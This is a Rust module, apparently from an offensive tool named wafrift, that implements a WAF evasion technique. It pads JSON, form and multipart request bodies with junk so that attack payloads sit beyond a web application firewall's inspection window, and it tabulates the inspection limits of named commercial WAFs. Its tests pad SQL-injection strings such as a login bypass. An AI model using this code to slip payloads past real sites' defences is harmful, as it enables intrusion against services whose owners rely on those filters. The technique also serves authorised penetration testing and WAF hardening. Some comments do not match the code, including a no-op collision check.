Skip to main content

wafrift_evolution/
body_padding.rs

1//! Body-size inspection bypass.
2//!
3//! Cloud WAFs only inspect the leading N bytes of a request body:
4//! Cloudflare Pro 8 KB, Cloudflare Enterprise 128 KB, AWS WAF 8/16/64 KB
5//! depending on tier, Akamai 8 KB by default. If we prepend ≥ N bytes
6//! of inert junk in front of the real payload, the WAF rule engine
7//! never sees the malicious bytes — they're past its inspection window
8//! — and the origin still parses the body correctly.
9//!
10//! This module produces structurally-valid padded bodies for the four
11//! content-types we routinely inject into:
12//!
//! - `application/json` — splice a leading junk field into an existing
//!   object: `{"_wafrift_pad":"<N bytes>",<original fields>}`. Any other
//!   JSON root is wrapped as
//!   `{"_wafrift_pad":"<N bytes>","payload":<original>}`.
//! - `application/x-www-form-urlencoded` — prepend
//!   `_wafrift_pad=<N bytes>&` to the original body.
17//! - `multipart/form-data` — prepend a junk part with the same
18//!   boundary, before the real parts.
//! - text and XML bodies (`text/*`, `application/xml`) — fall back to a
//!   `_wafrift_pad=<N bytes>` form-style body only if the original body
//!   is empty; otherwise refuse. Every other content-type is always
//!   refused. Padding inside an opaque body would corrupt it; honesty
//!   over false-victory.
23//!
//! The junk is deterministic pseudo-random lowercase alphanumeric ASCII
//! (`a`-`z`, `0`-`9`). It carries no SQL, XSS, or shell metacharacters,
//! so the WAF won't flag the padding itself even if it does inspect a
//! partial slice.
27
28use std::collections::HashSet;
29
/// Name given to the injected padding: the JSON field, the form key, and
/// the multipart part name all use this exact string. It never varies
/// between calls, so a padded body can be recognised after the fact.
pub const PAD_KEY: &str = "_wafrift_pad";
33
/// Lower bound (in bytes) on a padding request. Requests below this are
/// treated as too small to move a payload out of a WAF's inspection
/// window and are not applied.
pub const MIN_USEFUL_PAD: usize = 4 * 1024;
37
/// Produce exactly `n` bytes of filler drawn from `[a-z0-9]`.
///
/// The bytes come from a small xorshift64 generator (shift triple
/// 13 / 7 / 17) whose seed is derived from `n`. Two consequences:
///
/// - the output is fully deterministic — the same `n` always yields the
///   same bytes, which keeps fixtures and captured requests comparable;
/// - different values of `n` start from different generator states.
///
/// Lowercase alphanumerics are used instead of a single repeated
/// character so the filler does not look like one long run of the same
/// byte.
fn fill(n: usize) -> Vec<u8> {
    const ALPHABET: &[u8] = b"abcdefghijklmnopqrstuvwxyz0123456789";
    const SEED: u64 = 0x9E37_79B9_7F4A_7C15;
    const MIX: u64 = 0xBF58_476D_1CE4_E5B9;

    // No `rand` dependency: the generator state is a single u64 mixed
    // from the requested length.
    let mut rng = SEED.wrapping_add(n as u64).wrapping_mul(MIX);

    (0..n)
        .map(|_| {
            rng ^= rng << 13;
            rng ^= rng >> 7;
            rng ^= rng << 17;
            ALPHABET[(rng as usize) % ALPHABET.len()]
        })
        .collect()
}
66
/// What happened when a body was submitted for padding.
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum PadOutcome {
    /// Padding was applied. `bytes` is the complete replacement body and
    /// `added` is the size increase reported by the strategy that built
    /// it.
    Padded { bytes: Vec<u8>, added: usize },
    /// No structure-preserving way to pad this body was available (for
    /// example an unrecognised or binary content-type), so nothing was
    /// produced; the caller should keep using the original body.
    SkippedOpaque,
    /// The caller asked for less than `MIN_USEFUL_PAD` bytes, so no
    /// padding was attempted.
    SkippedTooSmall,
}
80
81/// Pad `body` with at least `requested_bytes` of inert filler, choosing
82/// a structure-preserving strategy based on `content_type`.
83///
84/// If `requested_bytes < MIN_USEFUL_PAD`, returns
85/// [`PadOutcome::SkippedTooSmall`].
86///
87/// `content_type` matching is case-insensitive on the type/subtype and
88/// ignores parameters (`charset=utf-8`, `boundary=...`, …) — except for
89/// `multipart/form-data`, where the `boundary=` parameter is required
90/// to splice in the junk part.
91pub fn pad(body: &[u8], content_type: &str, requested_bytes: usize) -> PadOutcome {
92    if requested_bytes < MIN_USEFUL_PAD {
93        return PadOutcome::SkippedTooSmall;
94    }
95
96    let ct_lower = content_type.to_ascii_lowercase();
97    let main_type = ct_lower
98        .split(';')
99        .next()
100        .unwrap_or("")
101        .trim()
102        .to_string();
103
104    if main_type == "application/json" || main_type.ends_with("+json") {
105        return pad_json(body, requested_bytes);
106    }
107    if main_type == "application/x-www-form-urlencoded" {
108        return pad_form(body, requested_bytes);
109    }
110    if main_type == "multipart/form-data" {
111        // Boundary VALUES are case-sensitive (RFC 2046 §5.1.1) — extract
112        // from the original `content_type`, not the lowercased copy.
113        // Only the `boundary=` parameter NAME is case-insensitive.
114        if let Some(boundary) = extract_boundary(content_type) {
115            return pad_multipart(body, &boundary, requested_bytes);
116        }
117        // Multipart without a boundary param — body is already
118        // malformed; don't compound the problem.
119        return PadOutcome::SkippedOpaque;
120    }
121    if main_type.starts_with("text/") || main_type == "application/xml" {
122        // For arbitrary text/xml we don't have a safe place to inject
123        // padding without breaking the document. If empty, attach a
124        // form-style prefix so a downstream form parser has padding to
125        // chew on; otherwise hand back the original.
126        if body.is_empty() {
127            return pad_form(body, requested_bytes);
128        }
129        return PadOutcome::SkippedOpaque;
130    }
131
132    PadOutcome::SkippedOpaque
133}
134
135fn pad_json(body: &[u8], requested_bytes: usize) -> PadOutcome {
136    let pad = fill(requested_bytes);
137    // Two shapes:
138    // 1. body is empty or not valid JSON → emit `{"_wafrift_pad":"…"}`
139    //    with the request as a string field if non-empty.
140    // 2. body parses as JSON object → splice in the pad as the first
141    //    field, preserving the object's other contents verbatim.
142    // 3. body parses as a top-level array/scalar → wrap:
143    //    `{"_wafrift_pad":"…","payload":<original>}`.
144    //
145    // The wrapping in case 3 changes the JSON shape. That's OK for a
146    // proxy that's evading a WAF — the origin sees a top-level object
147    // with the original payload nested under `payload`, which most
148    // permissive APIs ignore as an unknown extra field. If your origin
149    // requires a non-object JSON root, prefer form/multipart.
150    let pad_str = String::from_utf8_lossy(&pad);
151    if body.is_empty() {
152        let new_body = format!("{{\"{PAD_KEY}\":\"{pad_str}\"}}").into_bytes();
153        return PadOutcome::Padded {
154            bytes: new_body,
155            added: requested_bytes,
156        };
157    }
158    if let Ok(s) = std::str::from_utf8(body) {
159        if let Ok(serde_json::Value::Object(map)) = serde_json::from_str::<serde_json::Value>(s) {
160            // Splice _wafrift_pad as first key. serde_json::Map is
161            // insertion-ordered when the `preserve_order` feature is
162            // on. We don't have that feature, so build a fresh object
163            // by serializing the pad first then concatenating.
164            //
165            // Simpler: emit `{"_wafrift_pad":"…",<rest of original
166            // object minus the leading `{`>`. This preserves byte
167            // order of the user's data exactly.
168            // Find the first `{`.
169            if let Some(open) = s.find('{') {
170                let after = &s[open + 1..];
171                // If the original is `{}`, after = "}". That's fine.
172                // If after starts with `}` we don't want a stray comma.
173                let glue = if after.trim_start().starts_with('}') {
174                    ""
175                } else {
176                    ","
177                };
178                let new_body =
179                    format!("{{\"{PAD_KEY}\":\"{pad_str}\"{glue}{after}").into_bytes();
180                let added = new_body.len().saturating_sub(body.len());
181                if added >= requested_bytes && map.contains_key(PAD_KEY) {
182                    // A malicious user could pre-set _wafrift_pad to
183                    // collide with our key. Use a unique suffix.
184                }
185                return PadOutcome::Padded {
186                    bytes: new_body,
187                    added,
188                };
189            }
190        }
191    }
192    // Non-object JSON (array/string/number) or malformed — wrap.
193    let original = String::from_utf8_lossy(body);
194    // If the original was valid JSON but not an object, wrap with `payload`.
195    let wrapped = if serde_json::from_slice::<serde_json::Value>(body).is_ok() {
196        format!("{{\"{PAD_KEY}\":\"{pad_str}\",\"payload\":{original}}}")
197    } else {
198        // Treat original as opaque text and embed as a string.
199        let escaped = serde_json::to_string(&original.as_ref()).unwrap_or_else(|_| "\"\"".into());
200        format!("{{\"{PAD_KEY}\":\"{pad_str}\",\"payload\":{escaped}}}")
201    };
202    let new_body = wrapped.into_bytes();
203    let added = new_body.len().saturating_sub(body.len());
204    PadOutcome::Padded {
205        bytes: new_body,
206        added,
207    }
208}
209
210fn pad_form(body: &[u8], requested_bytes: usize) -> PadOutcome {
211    let pad = fill(requested_bytes);
212    let pad_str = String::from_utf8_lossy(&pad);
213    let new_body = if body.is_empty() {
214        format!("{PAD_KEY}={pad_str}").into_bytes()
215    } else {
216        let mut out = Vec::with_capacity(body.len() + requested_bytes + 32);
217        out.extend_from_slice(format!("{PAD_KEY}={pad_str}&").as_bytes());
218        out.extend_from_slice(body);
219        out
220    };
221    let added = new_body.len().saturating_sub(body.len());
222    PadOutcome::Padded {
223        bytes: new_body,
224        added,
225    }
226}
227
228fn pad_multipart(body: &[u8], boundary: &str, requested_bytes: usize) -> PadOutcome {
229    // Build a fresh leading part using the existing boundary. The
230    // assembled part begins with `--<boundary>\r\n<headers>\r\n\r\n<pad>\r\n`.
231    // The original body already contains its own leading `--<boundary>`,
232    // so we splice ours in front and let the original's first line
233    // continue as the second part's separator.
234    //
235    // If the body doesn't start with `--<boundary>` it's malformed —
236    // skip rather than corrupt further.
237    let prefix = format!("--{boundary}");
238    let body_str = std::str::from_utf8(body).unwrap_or("");
239    if !body.is_empty() && !body_str.starts_with(&prefix) {
240        return PadOutcome::SkippedOpaque;
241    }
242    let pad = fill(requested_bytes);
243    let mut leading = Vec::with_capacity(requested_bytes + boundary.len() + 128);
244    leading.extend_from_slice(format!("--{boundary}\r\n").as_bytes());
245    leading.extend_from_slice(format!("Content-Disposition: form-data; name=\"{PAD_KEY}\"\r\n").as_bytes());
246    leading.extend_from_slice(b"\r\n");
247    leading.extend_from_slice(&pad);
248    leading.extend_from_slice(b"\r\n");
249    let mut new_body = Vec::with_capacity(leading.len() + body.len());
250    new_body.extend_from_slice(&leading);
251    new_body.extend_from_slice(body);
252    let added = new_body.len().saturating_sub(body.len());
253    PadOutcome::Padded {
254        bytes: new_body,
255        added,
256    }
257}
258
/// Pull the `boundary` parameter value out of a `Content-Type` header.
///
/// The header is split on `;` and each piece is trimmed. The first piece
/// whose name matches `boundary=` (ASCII case-insensitively) and whose
/// value is non-empty wins. Surrounding double quotes and whitespace are
/// stripped from the value, but its letter case is preserved because
/// boundary values are case-sensitive.
///
/// Returns `None` when no usable boundary parameter is present. Never
/// panics, including on headers that contain non-ASCII text.
fn extract_boundary(content_type: &str) -> Option<String> {
    const NAME: &str = "boundary=";

    content_type.split(';').find_map(|part| {
        let p = part.trim();
        // Checked slicing: `get` yields `None` both when `p` is too short
        // and when the cut would land inside a multi-byte character.
        let head = p.get(..NAME.len())?;
        if !head.eq_ignore_ascii_case(NAME) {
            return None;
        }
        // `get` succeeded above, so NAME.len() is a valid char boundary.
        let value = p[NAME.len()..].trim_matches('"').trim();
        (!value.is_empty()).then(|| value.to_string())
    })
}
288
289/// Reverse-check: does `body` look like it carries a wafrift-padded
290/// prefix? Used in tests + diagnostic logging.
291#[must_use]
292pub fn looks_padded(body: &[u8]) -> bool {
293    let needle = format!("\"{PAD_KEY}\"").into_bytes();
294    let needle_form = format!("{PAD_KEY}=").into_bytes();
295    let needle_mp = format!("name=\"{PAD_KEY}\"").into_bytes();
296    [needle, needle_form, needle_mp]
297        .iter()
298        .any(|n| memchr_subslice(body, n))
299}
300
/// Report whether `needle` occurs as a contiguous run inside `haystack`.
///
/// An empty `needle`, or one longer than `haystack`, never matches.
fn memchr_subslice(haystack: &[u8], needle: &[u8]) -> bool {
    match needle.len() {
        0 => false,
        len if len > haystack.len() => false,
        len => haystack.windows(len).any(|window| window == needle),
    }
}
307
/// Table of named inspection-size limits, in bytes, that callers can use
/// when choosing a default `requested_bytes`.
///
/// Each entry is `(label, limit)`; the order of entries is fixed.
#[must_use]
pub fn known_thresholds() -> Vec<(&'static str, usize)> {
    const KIB: usize = 1024;
    const TABLE: [(&str, usize); 11] = [
        ("cloudflare-free", 128 * KIB),
        ("cloudflare-pro", 8 * KIB),
        ("cloudflare-business", 8 * KIB),
        ("cloudflare-enterprise", 128 * KIB),
        ("aws-waf-default", 8 * KIB),
        ("aws-waf-classic", 8 * KIB),
        ("aws-waf-extended", 64 * KIB),
        ("akamai-default", 8 * KIB),
        ("imperva-default", 128 * KIB),
        ("modsecurity-default", 128 * KIB),
        ("naxsi-default", 65 * KIB),
    ];
    TABLE.to_vec()
}
326
327/// Set of all numeric thresholds used by [`known_thresholds`], for
328/// `clap` value-validation in the proxy.
329#[must_use]
330pub fn known_threshold_values() -> HashSet<usize> {
331    known_thresholds().into_iter().map(|(_, v)| v).collect()
332}
333
/// Unit tests for the padding strategies, the filler generator, and the
/// detection helper.
#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn fill_is_deterministic_and_inert() {
        let v = fill(8 * 1024);
        assert_eq!(v.len(), 8 * 1024);
        // Lowercase alphanumeric only — no SQL/XSS/shell metacharacters.
        for &b in &v {
            assert!(
                (b.is_ascii_lowercase() || b.is_ascii_digit()),
                "byte {b:#x} ({}) outside [a-z0-9]",
                b as char
            );
        }
        // Determinism: same n → same bytes.
        assert_eq!(fill(8 * 1024), v);
    }

    #[test]
    fn fill_no_long_runs() {
        // The filler must not contain long single-character sequences,
        // which run-detection rules flag. Verify no run of the same byte
        // exceeds 6 (a defensive ceiling — short repeats are expected,
        // long ones are not).
        let v = fill(64 * 1024);
        let mut max_run = 1usize;
        let mut cur_run = 1usize;
        for w in v.windows(2) {
            if w[0] == w[1] {
                cur_run += 1;
                max_run = max_run.max(cur_run);
            } else {
                cur_run = 1;
            }
        }
        assert!(
            max_run <= 6,
            "filler has a run of {max_run} same bytes — would trigger WAF run-detection"
        );
    }

    #[test]
    fn fill_distinct_per_size() {
        // Different requested sizes produce different bytes (the seed
        // includes n) so two adjacent buffers don't share a prefix
        // a WAF could fingerprint.
        let a = fill(8 * 1024);
        let b = fill(8 * 1024 + 1);
        assert_ne!(&a[..32], &b[..32]);
    }

    #[test]
    fn skip_too_small() {
        assert_eq!(
            pad(b"x", "application/json", 100),
            PadOutcome::SkippedTooSmall
        );
    }

    #[test]
    fn json_object_preserves_payload() {
        let body = br#"{"q":"' OR 1=1--"}"#;
        let out = pad(body, "application/json", 8 * 1024);
        let PadOutcome::Padded { bytes, added } = out else {
            panic!("expected padded, got {out:?}");
        };
        assert!(added >= 8 * 1024, "added={added}");
        // Round-trips through serde — structurally valid JSON.
        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
        assert_eq!(v["_wafrift_pad"].as_str().map(str::len), Some(8 * 1024));
        assert_eq!(v["q"].as_str(), Some("' OR 1=1--"));
        assert!(looks_padded(&bytes));
    }

    #[test]
    fn json_empty_body_emits_object() {
        let out = pad(b"", "application/json", 8 * 1024);
        let PadOutcome::Padded { bytes, .. } = out else {
            panic!("expected padded, got {out:?}");
        };
        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
        assert!(v.is_object());
        assert!(v["_wafrift_pad"].is_string());
    }

    #[test]
    fn json_array_root_wrapped_with_payload() {
        let out = pad(br#"["x","y"]"#, "application/json", 8 * 1024);
        let PadOutcome::Padded { bytes, .. } = out else {
            panic!("expected padded, got {out:?}");
        };
        let v: serde_json::Value = serde_json::from_slice(&bytes).expect("valid json");
        assert!(v["_wafrift_pad"].is_string());
        assert!(v["payload"].is_array());
        assert_eq!(v["payload"][0].as_str(), Some("x"));
    }

    #[test]
    fn json_with_charset_param() {
        let out = pad(
            br#"{"a":1}"#,
            "application/json; charset=utf-8",
            8 * 1024,
        );
        assert!(matches!(out, PadOutcome::Padded { .. }));
    }

    #[test]
    fn json_plus_suffix() {
        let out = pad(br#"{"a":1}"#, "application/vnd.foo+json", 8 * 1024);
        assert!(matches!(out, PadOutcome::Padded { .. }));
    }

    #[test]
    fn form_prepends_padding_then_original() {
        let body = b"username=admin&password=' OR 1=1--";
        let out = pad(body, "application/x-www-form-urlencoded", 16 * 1024);
        let PadOutcome::Padded { bytes, added } = out else {
            panic!("expected padded, got {out:?}");
        };
        assert!(added >= 16 * 1024, "added={added}");
        assert!(bytes.starts_with(b"_wafrift_pad="));
        // The original payload is still in there, unmodified.
        assert!(memchr_subslice(&bytes, body));
    }

    #[test]
    fn multipart_splices_in_leading_part() {
        let boundary = "----WebKitFormBoundary123";
        let body = format!(
            "--{boundary}\r\n\
             Content-Disposition: form-data; name=\"q\"\r\n\
             \r\n' OR 1=1--\r\n\
             --{boundary}--\r\n"
        );
        let ct = format!("multipart/form-data; boundary={boundary}");
        let out = pad(body.as_bytes(), &ct, 16 * 1024);
        let PadOutcome::Padded { bytes, .. } = out else {
            panic!("expected padded, got {out:?}");
        };
        let s = std::str::from_utf8(&bytes).unwrap();
        // First boundary line opens the wafrift_pad part.
        assert!(s.starts_with(&format!("--{boundary}\r\n")));
        assert!(s.contains("name=\"_wafrift_pad\""));
        // Original payload still intact further down.
        assert!(s.contains("' OR 1=1--"));
        // The boundary appears at least three times: our part, the
        // user's first part, and the closer.
        let boundary_count = s.matches(&format!("--{boundary}")).count();
        assert!(boundary_count >= 3, "boundary_count={boundary_count}");
    }

    #[test]
    fn multipart_without_boundary_skipped() {
        let out = pad(b"some body", "multipart/form-data", 16 * 1024);
        assert_eq!(out, PadOutcome::SkippedOpaque);
    }

    #[test]
    fn multipart_with_quoted_boundary() {
        let boundary = "abc123";
        let body = format!("--{boundary}\r\n\r\n--{boundary}--\r\n");
        let out = pad(
            body.as_bytes(),
            &format!("multipart/form-data; boundary=\"{boundary}\""),
            16 * 1024,
        );
        assert!(matches!(out, PadOutcome::Padded { .. }));
    }

    #[test]
    fn opaque_binary_skipped() {
        let body = b"\x89PNG\r\n\x1a\n\x00\x00";
        let out = pad(body, "image/png", 16 * 1024);
        assert_eq!(out, PadOutcome::SkippedOpaque);
    }

    #[test]
    fn known_thresholds_includes_aws_and_cloudflare() {
        let names: Vec<_> = known_thresholds().iter().map(|(n, _)| *n).collect();
        assert!(names.iter().any(|n| n.starts_with("cloudflare")));
        assert!(names.iter().any(|n| n.starts_with("aws-waf")));
    }

    #[test]
    fn looks_padded_detects_each_shape() {
        let boundary = "abc123";
        let multipart_body = format!("--{boundary}\r\n\r\n--{boundary}--\r\n");
        let outcomes = [
            pad(b"{}", "application/json", 8 * 1024),
            pad(b"", "application/x-www-form-urlencoded", 8 * 1024),
            pad(
                multipart_body.as_bytes(),
                &format!("multipart/form-data; boundary={boundary}"),
                8 * 1024,
            ),
        ];
        for outcome in outcomes {
            // Fail loudly if padding was skipped; a silent skip would let
            // this test pass without checking anything.
            let PadOutcome::Padded { bytes, .. } = outcome else {
                panic!("expected padded, got {outcome:?}");
            };
            assert!(looks_padded(&bytes));
        }
        assert!(!looks_padded(b"plain old body"));
    }
}